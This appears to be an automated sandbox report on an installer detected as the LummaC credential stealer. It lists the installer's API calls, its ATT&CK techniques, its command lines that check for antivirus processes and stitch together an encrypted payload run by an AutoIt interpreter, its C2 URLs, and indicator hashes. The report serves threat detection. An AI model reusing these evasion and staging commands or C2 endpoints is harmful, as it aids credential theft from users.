Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		10_2_00A1A385
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1A354 SetUnhandledExceptionFilter,		10_2_00A1A354

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A49369 LogonUserW,

10_2_00A49369

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00A05240

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A51AC6 SendInput,keybd_event,

10_2_00A51AC6

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A551E2 mouse_event,

10_2_00A551E2

Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 485687	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT" Permitted	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\College + ..\Shelter + ..\Defects + ..\Populations + ..\Alive + ..\Bus k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\485687\Introduces.com Introduces.com k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

10_2_00A488CD

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A54F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00A54F1C

Source: Introduces.com, 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmp, Introduces.com, 0000000A.00000003.2650277752.00000000017D3000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Introduces.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A1885B cpuid

10_2_00A1885B

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A30030 GetLocalTime,__swprintf,

10_2_00A30030

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A30722 GetUserNameW,

10_2_00A30722

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A2416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

10_2_00A2416A

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: Introduces.com	Binary or memory string: WIN_81
Source: Introduces.com	Binary or memory string: WIN_XP
Source: Introduces.com	Binary or memory string: WIN_XPe
Source: Introduces.com	Binary or memory string: WIN_VISTA
Source: Introduces.com	Binary or memory string: WIN_7
Source: Introduces.com	Binary or memory string: WIN_8
Source: Diy.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A6696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		10_2_00A6696E
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A66E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		10_2_00A66E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	18%	ReversingLabs
Setup.exe	16%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\485687\Introduces.com	3%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
lumzulyj.shop	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://lumzulyj.shop/api	100%	Avira URL Cloud	malware
lumzulyj.shop	100%	Avira URL Cloud	malware
https://lumzulyj.shop/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net02	0%	Avira URL Cloud	safe
https://lumzulyj.shop:443/api	100%	Avira URL Cloud	malware
lumzulyj.shop	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lumzulyj.shop	104.21.24.90	true	true	4%, Virustotal, Browse	unknown
tLlYhvSbrTRqhxpzIwTuQjRbuHJm.tLlYhvSbrTRqhxpzIwTuQjRbuHJm	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
dare-curbys.biz	false		high
impend-differ.biz	false		high
lumzulyj.shop	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
zinc-sneark.biz	false		high
covery-mover.biz	false		high
https://lumzulyj.shop/api	true	Avira URL Cloud: malware	unknown
formy-spill.biz	false		high
se-blurry.biz	false		high
print-vexer.biz	false		high
dwell-exclaim.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	Introduces.com, 0000000A.00000000.1707960081.0000000000AB9000.00000002.00000001.01000000.00000007.sdmp, Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	false		high
http://ocsp.entrust.net03	Setup.exe	false		high
http://ocsp.entrust.net02	Setup.exe	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	Setup.exe	false		high
https://lumzulyj.shop:443/api	Introduces.com, 0000000A.00000002.2691276616.0000000001116000.00000004.00000020.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2692011561.0000000001410000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	Setup.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Setup.exe	false		high
http://crl.entrust.net/ts1ca.crl0	Setup.exe	false		high
https://www.autoitscript.com/autoit3/	Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	false		high
https://lumzulyj.shop/	Introduces.com, 0000000A.00000002.2692011561.0000000001410000.00000004.00000800.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2691661811.0000000001314000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/2048ca.crl0	Setup.exe	false		high
https://www.entrust.net/rpa0	Setup.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.24.90	lumzulyj.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570754
Start date and time:	2024-12-08 01:36:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@22/13@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 86 Number of non-executed functions: 306
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:37:15	API Interceptor	1x Sleep call for process: Setup.exe modified
19:37:18	API Interceptor	1932x Sleep call for process: Introduces.com modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	meerkat.mips.elf	Get hash	malicious	Mirai	Browse	8.44.96.113
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Unknown	Browse	104.21.35.78
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.165.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.24.90
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.90

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\485687\Introduces.com	JSWunwO4rS.lnk	Get hash	malicious	LummaC Stealer	Browse
	Yn13dTQdcW.exe	Get hash	malicious	Vidar	Browse
	DM6vAAgoCw.exe	Get hash	malicious	Orcus, Xmrig	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	File.exe	Get hash	malicious	Orcus, Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: JSWunwO4rS.lnk, Detection: malicious, Browse Filename: Yn13dTQdcW.exe, Detection: malicious, Browse Filename: DM6vAAgoCw.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: xoJxSAotVM.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\485687\k

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	440069
Entropy (8bit):	7.9996447588754656
Encrypted:	true
SSDEEP:	12288:GA9UZLdysmEbOfyVH/Eos58dB1lhxqsI+z:GRLdBifyHsWdB1km
MD5:	4C1F2FE088A9CE12A514C242E4C775EB
SHA1:	9DDDAD48AFB769FBE1BABA73F19924F1F428B9E0
SHA-256:	72423545A9D5B21825F323BCDBE7A183D619BCF1D6C35ECD53A0CD69A40B75E4
SHA-512:	58B93AC9FF8B05DFE6B6A9D4C185D51069605C57986AC947E499EE44AADA7C4113A0A9D02763B782E7ECBFCF1D12E098B45FBE223DF232335CB63E0B68C4C7EB
Malicious:	false
Preview:	+L..y....{HW`.1.x.&.3^h.....yo.......4T.Eni@.......... 4_.2...o...z...:.....U....#..q..\|b".i.^.u..U.2..+.".Q\|\|`..nL.....!=.m.....@..g.k?..u.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rz...N.;.'.F...h.............kE..+S..kE..+S..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.#..,P..Myn.2..t.W....83...8....0.kE..F...kE..+S..m........r8.5...x..2(.U.j...."e.t#.A.....\|).....=.)....h..u,@..!..2.-..........4.S...pw..aU.-"].VQGhg...g.....I...[..~.....m..!.......Q.FG...,g.......U5.7o0.L..im....k..3.r..{).?F.I.?...v6Z0m]r...,.]>.......[..d...bC.v9.]Z......;Dlg.[.V.g._....l.>.....(.N..T).}..L..~'....u.\|....k%F.....\|@t..NMw++...V.o.......5...0..Z....I.H.......Zy.......C.O.Q.(....}.

C:\Users\user\AppData\Local\Temp\Alive

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.99728583023769
Encrypted:	true
SSDEEP:	1536:UJrvJdKZY2Rx/YfH8Gr9O2r8J1qiYSBYO7tCzgGMIKdFwtz:0hqBRqkG5D8rZBYP0lhi
MD5:	565E3B514557977EC79DC9DDFF6573D5
SHA1:	CA09901469FF3E9E0B49C20C212E888F9098CFBA
SHA-256:	05B297F4F7F4332226D5A19D53623B6EA4762454AEFC2F2C8BF316736BB0949D
SHA-512:	1CD9AD5A71D5335BBC45595ACA60595791FD0C0F51BA681DEE4604A80F013B95EE40D2ECDC8A44B595F3D8BC9E451934630D42FE1E8469B8A8671236F67ECF86
Malicious:	false
Preview:	..]O.Z..8...C...I..H..v.g.........@.o8;{x..t.j#...b..>........e ZtR....y.k...{..=.'.7......8...O..p._+^....l._.0.'.Z....Gn..UZ(G..,.6H.bR.Gj..N.}^#'.......X.iWZx......r7Q..d..O..._8....V.l.[.'...N..`.}..y...%...$......)....EZ%..n.......E.@...l&..C.....[.....Ac....U..%.;j.b..5@/...n.....$.s=..j..i....'..%..J+w.....0H.0.>0>.........Jh.g{......-.....~@..q"A6uv.Xw..L...?........T.h.....[2...ECY..A...h.lB.v...b.x....'......D'.....W."m.t.f.-H.C$...)0}.s.d.#k."l.....d.A....vFa..^..5g\7p'uE.X..).t..... %...Nc..^L.......Ek(rG..H}..rC.m...9.K....>...u..2.^....4y..\|p.l.c...?.T...cK..Yfsc........jf.WT4P.3g16... ..L\hTH...n#......X.4c)):.\.......h?.Q.. J!...5..[...q..DM....<...m.{."j....)..p<L]yP..........OL..K,........0.c...mH..g.39{.i....rsX.*.A.3.UK.).j....8!@3..1...d..X..~.z...5..n........1....G<.....?"...j..z.Oc...3..8.^......~.+.-.!;0s....s.....E.L...T_..7....DH;.7..3Y..I...w...u.HD....S.&-.......v.Ft.H..V&zQ...E....S. ......`.....\|.....U...7....W...\B

C:\Users\user\AppData\Local\Temp\Bus

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	45829
Entropy (8bit):	7.996479460175736
Encrypted:	true
SSDEEP:	768:jYR0bwgxSwwFP1jfSI0tdn1wwMbon0m/RCDSYH/F166y+TMkWcn49Hht5d5lkbt5:cWMgxSw+5ShywMbonJVYfFIKTR49P5du
MD5:	98D218705DAF82CC310B60BD21BB18C3
SHA1:	3CC877414C559EDF069DB3F60FA01854A70B961F
SHA-256:	E70B283C441E9721C476A18D5717BF41D2097415104FA509A0562E39F7FE91AF
SHA-512:	E336B1BF9A0791EDB26DD012A5871FA044CEE587EB6447052E8E8287CB8F75666F645FF0588247A7E4E16D443D0F9A21AA13BEE23D591D429F9D86EA51507373
Malicious:	false
Preview:	6g..........+...&r."k...jpe...f..;..Qrb..h..a;H...x..p...... :....<V.S.:..@mM`B...26!t.2P...m....AzQ.:...A{_8R._.$_....w>..iL.7-u..}5..p.I..p...]VW..a......`t.....t.a.2@C7.o.S...l.8.....I....Z..r....}..%3>.3....z...D....]B....W..xf.E..]..H~U...CE.[`c.a.......<......}.......{......5..&.,Y8>.T..........9...^..C......9\g.. ..&......w...... P.z&.Y.R$..e?...E.1...'Z".$..SZ...!!.cO..w[...=qT{.K..\...9.@.v.z.&..~..7......:..3G.?.(L.\|...&...Q{..Q..Mp.\"4^...$.sX...Y.#.....>.O.r[W..}q....w7..I.t..0.../.].~hq......>..4.!.y..h..]..M...O.E.xW.7d......yf#aLFsT#.....,.(n..)...?.`..i.>.t.:pd...9.>...../..m&q.u,.-..,.H....^s..,..U...$Bv@dF..,5..............stY.9?:m.JB...W..3.L..q1G.1.$>.)......$}3. L......y..^,.Q...JBPZ...60.6..~..h.Q....7U..QK...Vv.v.sS._....Y..`x.ag...IH.8Fs..1......0......6!..g.B..Fp....r.G....R.64;0..x.*...w...=.w..y...o..._A#l+.l@19.".JV.....%..r.g..;.H}.yev......v....._...L.t.E.{.^z....+.iG....zl..3.)o..JP..m..-..8..K...S..p.=

C:\Users\user\AppData\Local\Temp\Cardiff

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	3807
Entropy (8bit):	7.447312722357554
Encrypted:	false
SSDEEP:	48:6wHTHiNa+KLpt+4SV3tGKeoOfdiH1YyNRoYzrnK0OmyOO2UKxbQ0JYcmcY1B+b/l:DHiNCLqcRVK1fy0Oo+zAbQ6YhbB+h
MD5:	A69D2A6B4F024959E729837CAF86CF4E
SHA1:	8A44BEB9F9CE71C40A78D079D9D2A46F020F4D5D
SHA-256:	F97998F9EBD6E43498F7DC37A34FECEAFDA7E50C098EC88630421F3580C344FB
SHA-512:	474702DE0F1AD23171579C18592D9B1C0E09CA25986DE807BCC22882A0004394148CD005109C32846280C345CD50A0055FB7F5FF9CE22595D663C54931AC76D3
Malicious:	false
Preview:	/0....H........0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA256 - G20...170124100000Z..280224100000Z0_1.0...U....JP1.0...U....GMO GlobalSign K.K.1200..U...)GlobalSign TSA for Advanced - G3 - 001-020.."0....H.............0..........w..o....^H.vw..1L.Z....`....{..'F..B.S...yu.D@....f.&.nr.....p..>..........=.wWU......e7_./..=. .ynm.s.q..i.l9.oYYe....u....?HA...B4'.z..:...{.^%....e......U..5.-..#a.p.~...d.Cc...mI.g{.n.LF.....??...<O..7..34...a.d.^..5..+.7..!...g@W..r...E.........0...0...U...........0L..U. .E0C0A..+.....2..0402..+........&https://www.globalsign.com/repository/0...U....0.0...U.%.....0...+.......0F..U...?0=0;.9.7.5http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0....+..........0..0H..+.....0..<http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0<..+.....0..0http://ocsp2.globalsign.com/gstimestampingsha2g20...U....../...........\AK... 0...U.#..0....!.J.]d......7G.A+L0...*.H................oU1.@..)F#....y1`

C:\Users\user\AppData\Local\Temp\College

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998327299750921
Encrypted:	true
SSDEEP:	3072:rt0AnDGpCxR09xZHLvdxaw0U+T1aYjSfqYI:x0An9TwZHLvd07UyaYC7I
MD5:	9F6A3D77E22BCF40E31E541860F7DD5A
SHA1:	35E50E8E9073F8742DC36407FD2F875C07841C75
SHA-256:	6390F8646BCB4DFCA1BA8F169FA92471318CB5B31CDABD28B0397FBFA20E579D
SHA-512:	46916B504BCA4D96372F7BF965B08F76981874824DB7FA3D0521947A9795B2A9D4B79631B34FCC11DEA08A57A3829DDE52D3DC1B7C5EB6D659BCA929D9983902
Malicious:	false
Preview:	+L..y....{HW`.1.x.&.3^h.....yo.......4T.Eni@.......... 4_.2...o...z...:.....U....#..q..\|b".i.^.u..U.2..+.".Q\|\|`..nL.....!=.m.....@..g.k?..u.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rz...N.;.'.F...h.............kE..+S..kE..+S..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.#..,P..Myn.2..t.W....83...8....0.kE..F...kE..+S..m........r8.5...x..2(.U.j...."e.t#.A.....\|).....=.)....h..u,@..!..2.-..........4.S...pw..aU.-"].VQGhg...g.....I...[..~.....m..!.......Q.FG...,g.......U5.7o0.L..im....k..3.r..{).?F.I.?...v6Z0m]r...,.]>.......[..d...bC.v9.]Z......;Dlg.[.V.g._....l.>.....(.N..T).}..L..~'....u.\|....k%F.....\|@t..NMw++...V.o.......5...0..Z....I.H.......Zy.......C.O.Q.(....}.

C:\Users\user\AppData\Local\Temp\Defects

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.997078476687112
Encrypted:	true
SSDEEP:	1536:mDrmnUHH/zLF6WtWLWQvkCxHGXojbCFIR15B:mPmWHnFToncYjbj/L
MD5:	A5183F0D4783E58750AEBDE2308A7D6B
SHA1:	6F54FB220562F74DE4D31B92099E0A523F08EA6D
SHA-256:	E3E40DFD03858C7C1F56F887C604E4B61453D3CB26C030C1A8B0F1CC1BAD623A
SHA-512:	DFE6225FA363AE0B0AAC1FD914AD0A00E86D0FFC85F0ACBAF704E98F6AFA101711FB3B8BD386DB860D207D84C851B295D23F85824A860C75B140E1AD5702D311
Malicious:	false
